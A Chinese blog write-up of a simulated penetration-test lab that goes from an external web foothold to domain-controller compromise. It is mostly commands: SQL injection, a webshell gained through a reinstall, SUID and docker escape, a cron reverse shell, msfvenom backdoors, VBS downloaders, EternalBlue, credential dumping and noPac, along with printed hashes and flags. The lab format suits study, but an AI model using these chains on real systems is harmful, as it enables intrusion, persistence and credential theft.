模拟实战从外网打点渗透到内网域控的笔记

news2024/12/23 13:08:48

信息收集

本次项目是一个是模拟渗透测试 电信诈骗网站,境外人员依赖该网站通过优惠卷诱导受害者进行消费,
诈骗受害人金钱。
前台地址
项目拓扑图
在这里插入图片描述

http://ip/user.php?mod=do&act=login&fromto=http%3A%2F%2F43.143.193.216%2F

后台地址

http://ip/admin/webadmin.php?mod=do&act=login

robots.txt

前台注册信息

18945612354

yesir

123456

个人中心:

http://ip/user.php

逍遥商城

在这里插入图片描述

根据响应返回值的不同,尝试爆破弱口令。

在这里插入图片描述

爆破成功,密码nasa123

在这里插入图片描述

代码审计

经过移动端的代码审计,发现存在注入

在这里插入图片描述

然后构造payload

在这里插入图片描述

跑一下sqlmap,爆出库表

在这里插入图片描述

得出管理员密码

nasa123

然后登录后台寻找漏洞

访问重装目录发现如下提示

在这里插入图片描述

要是重装需要删除install.lock文件

在后台备份处找到可以删除文件的功能点

在这里插入图片描述

尝试是否有任意文件删除漏洞

查看源代码

在这里插入图片描述

在这里插入图片描述

发现并没有对删除的目录进行过滤

利用任意文件删除漏洞删除install.lock文件

在这里插入图片描述

在这里插入图片描述

任意文件写入配合重装系统获取webshell

然后发现可以重装系统,这也是个重装系统漏洞。

在这里插入图片描述

然后通过任意文件写入getshell,因为重装信息会写到config.php,也就 给了我写马的机会.

拼接一句话

在这里插入图片描述

重装访问config.php成功拿到webshell。

在这里插入图片描述

提权

查找可以进行suid提权的命令

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

touch test
find test -exec whoami \;

在这里插入图片描述

判断在ls -alh /.dockerenv 容器内

ls -alh /.dockerenv

在这里插入图片描述

反向代理msf linux上线

在vps上设置 frps.ini

[common]
bind_port = 7000
token=yesir.aaaa

2.在内网的kali上配置frpc.ini

server_addr = vps-ip
server_port = 7000
token=yesir.aaaa
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6666
remote_port = 6666
[msf2]
type = tcp
local_ip = 127.0.0.1
local_port = 7777
remote_port = 7777

配置好运行客户端和服务端

3.msf生成linux elf后门文件

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.59.138 lport=6666 -f
elf -o yesir.elf

4.msf设置监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > exploit

5.webshell执行后门

chmod +x yesir.elf
find test -exec ./yesir.elf \;

在这里插入图片描述

提取成功,root权限

在这里插入图片描述

创建linux root用户

openssl passwd -1 -salt yesir 123456
echo 'yesir:$1$yesir$Apee9NXsjpedOFK06C6tu0:0:0:root:/root:/bin/bash' >>
/etc/passwd

在这里插入图片描述

创建交互shell

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
bash-4.3$
bash-4.3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.3$ su moonsec
su moonsec
Password: 123456

在这里插入图片描述

docker提权

现在还是处于容器内,所以还要进行提权到宿主上。在docker如果启动的时候 --privileged=true 是 可以逃逸的。 挂载宿主硬盘到test目录

创建目录
mkdir /test
将宿主的目录挂载到test目录
mount /dev/sda1 /test
改变根目录为 /test
chroot /test

在这里插入图片描述

宿主的目录

在这里插入图片描述

创建反弹shell

echo '/bin/bash -i >& bash -i >&/dev/tcp/192.168.59.128/23333 0>&1' >
/root/sec.sh
chmod +x /root/sec.sh
cat /tmp/sec.sh
写到计划任务里
echo '*/1 * * * * root bash /root/sec.sh' >>/etc/crontab

得到第一个flag

在这里插入图片描述

成功写到计划任务里

在这里插入图片描述

nc监听,等待反弹shell

vps     nc -lnvp 23333

通过任务获取宿主的反弹shell

在这里插入图片描述

宿主ubuntu msf后门上线

下载后门 添加运行权限 执行即可

wget http://192.168.59.128/yesir.elf

msf上线成功

在这里插入图片描述

内网横向渗透

msf设置代理扫描内网

添加路由

run get_local_subnets
run autoroute -s 192.168.59.0/255.255.255.0
run autoroute -p

在这里插入图片描述

启用代理,使用sock5

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >

设置 kali 的 /etc/proxychains4.conf 文件

sudo vim /etc/proxychains4.conf

添加 socks5 127.0.0.1 1080

在这里插入图片描述

利用代理,nmap扫描内网445端口

proxychains4 nmap -sT -Pn 192.168.59.0/24 -p 445 --open

nmap扫描结果

在这里插入图片描述

使用fscan扫描内网存活主机与端口

proxychains4 ./fscan_amd64 -h 192.168.59.0/24 -np -no -nopoc  

fscan扫描结果

在这里插入图片描述

永恒之蓝

尝试对开放445端口的主机使用永恒之蓝攻击

use windows/smb/ms17_010_eternalblue
set pyaload windows/meterpreter/bind_tcp #选择正向shell
set rhosts 192.168.59.197
run

利用失败

在这里插入图片描述

根据扫描结果,发现有server2003的主机,尝试利用iis6.0 溢出获取权限

proxychains4 python2 ii6.py 192.168.59.144 80 192.168.59.128 4455

在这里插入图片描述

获得shell

在这里插入图片描述

S09-020-KB970483-CVE-2009-1535-IIS6 2003提权

vbs下载后门

echo set a=createobject(^"adod^"+^"b.stream^"):set
w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.se
nd:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>
downfile.vbs
cscript downfile.vbs http://192.168.59.128/IIS6.0.exe iis6.exe

获取系统权限

在这里插入图片描述

msf生成win后门上线

生成msf后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.59.128 lport=7777 -f exe -o s.exe

靶机下载msf后门

cscript downfile.vbs http://192.168.59.128/s.exe 2.exe

在这里插入图片描述

2003主机信息收集

内网10段扫描

C:\nasa>nbtscan -r 10.10.10.0/24

在这里插入图片描述

使用msf中的kiwi模块获取凭证

meterpreter > hashdump
Administrator:500:6c634e36565f85fc9c5014ae4718a7ee:f099c4a637f9b871487bbb03962f7
9b5::: 明文 admin555
ASPNET:1006:c5f4c32e080b1c0a19f45641a62db986:5643281884dd972acd9b0eaeecd13522:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW79FA760B73D:1000:a1323e561696c32ad68862a8c0118e7e:00dd987a1d0c4540f919b3eb5fc0b1
cd:::
IWAM_WWW79FA760B73D:1001:123dec921ecc0ca82f1106015d8abba7:556f2d1b30d88fc35eb8c4d573a5cd
14:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:f739006531fcc09af8615f957
5fa943c:::

smb 用户批量爆破

把netbios name设置用户列表 使用smb 登录模块进行批量弱口令测试

用户列表

administrator WIN2003 AD01 AD02 WIN7

使用smb模块

use scanner/smb/smb_login

在这里插入图片描述

psexec登录获取shell

use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.59.197
RHOSTS => 192.168.59.197
msf6 exploit(windows/smb/psexec) > set smbpass admin555
smbpass => admin555
msf6 exploit(windows/smb/psexec) > set smbuser WIN7
set payload windows/meterpreter/bind_tcp

impacket smbsxec 登录失败

└─$ proxychains4 python3 smbexec.py WIN7:admin555@10.10.10.142
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.10.142:445  ...  OK
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
                                                          

ms17_010_psexec 登录

use windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set smbuser win7
set smbpass admin555
run

在这里插入图片描述

win7主机信息收集

成功获取一个域普通用户

迁移下进程然后获取win7

hashdump

在这里插入图片描述

kiwi_cmd sekurlsa::logonPasswords

在这里插入图片描述

CVE-2021-42278 and CVE-2021-42287 攻击域控

工具地址:https://github.com/Ridter/noPac

在攻击域控之前修改/etc/resolve.conf,修改DNS为10.10.10.140

proxychains4 python noPac.py nasa.gov/test:'QWEasd!@#999' -dc-ip 10.10.10.140 -
dc-host AD01 -shell --impersonate administrator
proxychains4 noPac.py nasa.gov/test:'QWEasd!@#999' -dc-ip 10.10.10.140 -dc-host
AD01 --impersonate administrator -dump

在这里插入图片描述

域控的hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:fbe5588a79e40d41d77a40569c7b3
090:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0
89c0:::

根据域控hash获取域控的权限

在这里插入图片描述

备份域的权限

在这里插入图片描述

主机名flag
ad01ad01 moonsec_flag{2181d94fba9a1d2de2b5f6fb75f8ab08}
ad02moonsec_flag{d3eb9a9233e52948740d7eb8c3062d14}
win2003moon_flag{7555051b6d8a2dca27a29f9cb0d2e3a6}
ubuntumoonsec_flag{182be0c5cdcd5072bb1864cdee4d3d6e}
win7moon_flag{0b08bd98d279b88859b628cd8c061ae0}

这次模拟实战的项目几乎是第一次做这么完整的项目从外网渗透到内网域控,这次渗透过程中学到了很多东西,但很多也是我应该熟练使用的。继续加油。

在这里插入图片描述

来人间一趟 你要看看太阳

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/80831.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

rabbitmq基础2——rabbitmq二进制安装和docker安装、基础命令

文章目录一、RabbitMQ安装1.1 二进制安装1.2 rabbitmqctl工具1.3 docker安装二、rabbitmq基础命令2.1 多租户与权限类2.1.1 创建虚拟主机2.1.2 查看虚拟主机信息2.1.3 删除虚拟主机2.1.4 给用户授权2.1.5 清除用户权限2.1.6 查看权限2.2 用户管理类2.2.1 创建用户2.2.2 查看用户…

爱心源码动图-Html网页运行

程序示例精选 爱心源码动图-Html网页运行 如需安装运行环境或远程调试,见文章底部微信名片! 前言 Html写的追女生神器-爱心动图,代码整洁,规则,易读,对学习与使用Html有较好的帮助。 文章目录 一、所需工具…

Redis高可用之主从复制、哨兵、cluster集群

Redis高可用之主从复制、哨兵、cluster集群Redis 高可用什么是高可用Redis的高可用技术Redis主从复制主从复制的作用主从复制流程搭建Redis主从复制所有节点安装Redis修改master节点的配置文件修改slave节点的配置文件验证主从效果Redis哨兵模式哨兵模式的作用哨兵结构故障转移…

Redis集群模式

目录 前言 一、集群的作用 二、集群模式的数据分片 三、集群模式的主从复制模型 四、Redis集群模式 Redis集群部署 开启群集功能 修改所有集群服务的配置文件端口,使其不一致 启动集群 集群测试 前言 1、集群,即 Redis Cluster, …

模型效果差?我建议你掌握这些机器学习模型的超参数优化方法

模型优化是机器学习算法实现中最困难的挑战之一。机器学习和深度学习理论的所有分支都致力于模型的优化。 机器学习中的超参数优化旨在寻找使得机器学习算法在验证数据集上表现性能最佳的超参数。超参数与一般模型参数不同,超参数是在训练前提前设置的。举例来说&a…

CKA考试Tips

前言 今年黑五的双证套餐的折扣比双11时还便宜个200多,不到2000,应该是史低吧,反正比前年低。即使考试前看了各种避坑技巧,虽然通过了但是结果还是因为各种问题导致时间不够没做完扣分,于是下面总结一下参加CKA/CKS考试时候的技巧。 报名及考…

[基因遗传算法]进阶之四:实践VRPTW

参考资料: 《旅行商问题(TSP)、车辆路径问题(VRP,MDVRP,VRPTW)模型介绍》 本文对《基于GA算法解决VRPTW》的分析和思考.具体的代码可以参考 《Python实现(MD)VRPTW常见求解算法——遗传算法(GA)》 . 文章目录壹、VRPTW一. 定义类二、数据读取三. 构造初…

JVM调优手段

JDK提供命令工具 jstat 是用于监视虚拟机各种运行状态信息的命令行工具。它可以显示本地或者远程虚拟机进程中的类装载、内存、垃圾收集、JIT 编译等运行数据,在没有 GUI图形界面,只提供了纯文本控制台环境的服务器上,它将是运行期定位虚拟…

博球一看,CSDN与你共观世界杯

2022卡塔尔世界杯不知不觉已接近尾声,不仅让人感叹,乌拉圭,巴西,葡萄牙都已淘汰,四强诞生分别是阿根廷,法国,摩洛哥,克罗地亚,非常期待梅西和魔笛的对决,也希…

电子学会2020年12月青少年软件编程(图形化)等级考试试卷(三级)答案解析

目录 一、单选题(共25题,每题2分,共50分) 二、判断题(共10题,每题2分,共20分) 三、编程题【该题由测评师线下评分】(共3题,共30分) 青少年软件…

【云计算与大数据技术】虚拟化简介及虚拟化的分类讲解(图文解释 超详细)

一、虚拟化简介 1:什么是虚拟化 虚拟化是指计算机元件在虚拟的基础上而不是在真实的、独立的物理硬件基础上运行。这种以优化资源、简化软件的重新配置过程为目的的解决方案就是虚拟化技术 虚拟化架构就是在一个物理硬件机器上同时运行多个不同应用的独立的虚拟系…

r语言中对LASSO回归,Ridge岭回归和弹性网络Elastic Net模型实现|视频

Glmnet是一个通过惩罚最大似然关系拟合广义线性模型的软件包。正则化路径是针对正则化参数λ的值网格处的lasso或Elastic Net(弹性网络)惩罚值计算的。 最近我们被客户要求撰写关于LASSO的研究报告,包括一些图形和统计输出。该算法非常快&am…

电子学会2020年12月青少年软件编程(图形化)等级考试试卷(四级)答案解析

目录 一、单选题(共15题,每题2分,共30分) 二、判断题(共10题,每题2分,共20分) 三、编程题【该题由测评师线下评分】(共4题,共50分) 青少年软件…

51单片机——LED 点阵点亮一个点,小白详解

LED点阵介绍: LED点阵是由发光二极管排列组成的显示器件,在我们生活中的电器中随处可见,被广泛用于汽车报站器,广告屏等。 通常用用较多的是8*8点阵,然后使用多个8*8点阵组成不同分辨率的LED点阵显示屏,比如…

kubernetes--kube-proxy组件深入理解

文章目录kube-proxy的工作原理netfilter的运行机制ipvs和iptables有什么区别?iptables在网络栈的hook点更多,而ipvs的hook点很少iptables的hook点ipvs的hook点如何切换?ipvs安装为何推荐ipvs?为什么iptables或者ipvs在每个节点上都…

面试官:你会几种分布式 ID 生成方案???

1. 为什么需要分布式 ID 对于单体系统来说,主键 ID 常用主键自动的方式进行设置。这种 ID 生成方法在单体项目是可行的,但是对于分布式系统,分库分表之后就不适应了。比如订单表数据量太大了,分成了多个库,如果还采用…

基于java+springboot+mybatis+vue+mysql的福聚苑社区团购

项目介绍 随着互联网的发展,各种团购模式也越来越多,尤其是最近几年的社区团购模式更是如火如荼的在进行着,我了能够让大家品味到更多的瓜果蔬菜,我们通过java语言,springboot框架、前端vue技术、数据库mysql开发了本…

使用Hilt搭建隔离层架构

在我们的日常编码的过程中,常常会遇到这种需求。例如:这个版本我们使用okhttp作为网络通信库,如果下个版本我们想要用volley作为网络通信库,那该怎么办呢?我们总不能对使用okhttp的地方一个个改成volley吧!…

上班都在刷的Java八股文,老板都想要一份?

今天心血来潮刷刷牛客看到这,小伙在上班刷八股文被老板逮到!真行啊,结果还让他给老板也发一份,感觉过不了多久就跟老板一起提桶跑路了 说到这,我最近也整理了GitHub上高标星的面试八股文,这种金九银十的节骨…

Java并发编程之Condition await/signal原理剖析

Java并发编程之Condition await/signal原理剖析 文章目录Java并发编程之Condition await/signal原理剖析Condition与Lock的关系Condition实现原理await()实现分析signal()实现分析Condition接口与Object监听器的区别Condition与Lock的关系 Condition本身也是⼀个接口&#xff…